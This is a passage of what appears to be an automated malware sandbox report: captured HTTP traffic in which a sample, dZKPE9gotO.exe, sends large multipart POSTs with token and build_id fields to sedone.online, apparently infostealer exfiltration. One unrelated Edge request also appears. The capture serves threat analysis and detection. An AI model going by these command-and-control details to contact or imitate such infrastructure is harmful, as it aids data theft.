                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.749882116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----T0HVAS00R1NYU3OPH4O8
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 393697
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 54 30 48 56 41 53 30 30 52 31 4e 59 55 33 4f 50 48 34 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 56 41 53 30 30 52 31 4e 59 55 33 4f 50 48 34 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 56 41 53 30 30 52 31 4e 59 55 33 4f 50 48 34 4f 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------T0HVAS00R1NYU3OPH4O8Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------T0HVAS00R1NYU3OPH4O8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------T0HVAS00R1NYU3OPH4O8Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.74987623.58.157.244435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                Host: assets.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                Server: AkamaiNetStorage
                                                                                                                                                                                                                                                Akamai-Loopback-Request: 8096267
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:16 GMT
                                                                                                                                                                                                                                                Content-Length: 354
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Akamai-Request-BC: [a=23.216.133.71,b=106201228,c=g,n=US_NJ_PISCATAWAY,o=20940]
                                                                                                                                                                                                                                                Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                Akamai-Server-IP: 23.216.133.71
                                                                                                                                                                                                                                                Akamai-Request-ID: 654808c
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Akamai-GRN: 0.4785d817.1734360016.654808c
                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.749902116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----5F3EKNYUK6FUAA1DT000
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 46 33 45 4b 4e 59 55 4b 36 46 55 41 41 31 44 54 30 30 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------5F3EKNYUK6FUAA1DT000Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------5F3EKNYUK6FUAA1DT000Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5F3EKNYUK6FUAA1DT000Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
